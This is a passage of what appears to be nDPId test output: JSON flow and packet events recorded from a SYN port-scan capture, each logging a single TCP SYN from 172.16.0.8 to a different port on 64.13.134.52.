-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"synscan.pcap","alias":"nDPId-test","flow_id":738,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KcAACcGQMusEAAIQA2GNIzSFR3dUoMYAAAAAGACEAATcgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"synscan.pcap","alias":"nDPId-test","flow_id":739,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs36oAADkGL8isEAAIQA2GNIzSE7vdUoMYAAAAAGACCAAc1AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059631,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_packet_id":1,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059631,"pkt":"ACYLMQczACWzv5HuCABFAAAs554AADQGLNSsEAAIQA2GNIzSCU\/dUoMYAAAAAGACBAArQAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVqIAAC8GwtCsEAAIQA2GNIzSB+bdUoMYAAAAAGACEAAgqQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsVJQAADMGwN6sEAAIQA2GNIzSGW7dUoMYAAAAAGACEAAPIQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAstzAAADsGVkKsEAAIQA2GNIzSJpTdUoMYAAAAAGACEAAB+wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsJgwAACcG+2asEAAIQA2GNIzSBDDdUoMYAAAAAGACEAAkXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAs964AACcGKcSsEAAIQA2GNIzSE4ndUoMYAAAAAGACEAAVBgAAAgQFtA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"synscan.pcap","alias":"nDPId-test","flow_id":746,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAsirUAADEGjL2sEAAIQA2GNIzSH\/XdUoMYAAAAAGACCAAQmgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"synscan.pcap","alias":"nDPId-test","flow_id":747,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAshrwAADsGhrasEAAIQA2GNIzSAS3dUoMYAAAAAGACEAAnYgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059632,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_packet_id":1,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059632,"pkt":"ACYLMQczACWzv5HuCABFAAAscvcAADcGnnusEAAIQA2GNIzSBDbdUoMYAAAAAGACEAAkWQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6vkAADMGKnmsEAAIQA2GNIzTPpDdU4MZAAAAAGACEADp+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsHf8AADQG9nOsEAAIQA2GNIzTBPfdU4MZAAAAAGACBAAvlQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"synscan.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs+ZUAAC4GIN2sEAAIQA2GNIzTIADdU4MZAAAAAGACDAAMjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"synscan.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsvIsAACoGYeesEAAIQA2GNIzTySXdU4MZAAAAAGACDABjZgAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"synscan.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs728AAC8GKgOsEAAIQA2GNIzTACrdU4MZAAAAAGACEAAoYgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2IAACsGfhCsEAAIQA2GNIzTdTDdU4MZAAAAAGACEACzWwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"synscan.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsaiIAADUGqVCsEAAIQA2GNIzTEyTdU4MZAAAAAGACCAAdaAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"synscan.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAslZYAADEGgdysEAAIQA2GNIzTD5vdU4MZAAAAAGACCAAg8QAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAADgGTEqsEAAIQA2GNIzTBBzdU4MZAAAAAGACBAAwcAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6LcAADgGJ7usEAAIQA2GNIzTBD7dU4MZAAAAAGACBAAwTgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3546,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"synscan.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsmusAACsGgoesEAAIQA2GNIzTDdrdU4MZAAAAAGACEAAasgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19842,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"synscan.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAsBN8AADAGE5SsEAAIQA2GNIzTTYLdU4MZAAAAAGACBADnCQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"synscan.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059675,"pkt":"ACYLMQczACWzv5HuCABFAAAs6BkAADcGKVmsEAAIQA2GNIzTS3PdU4MZAAAAAGACEADdGAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"synscan.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059675,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1218,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 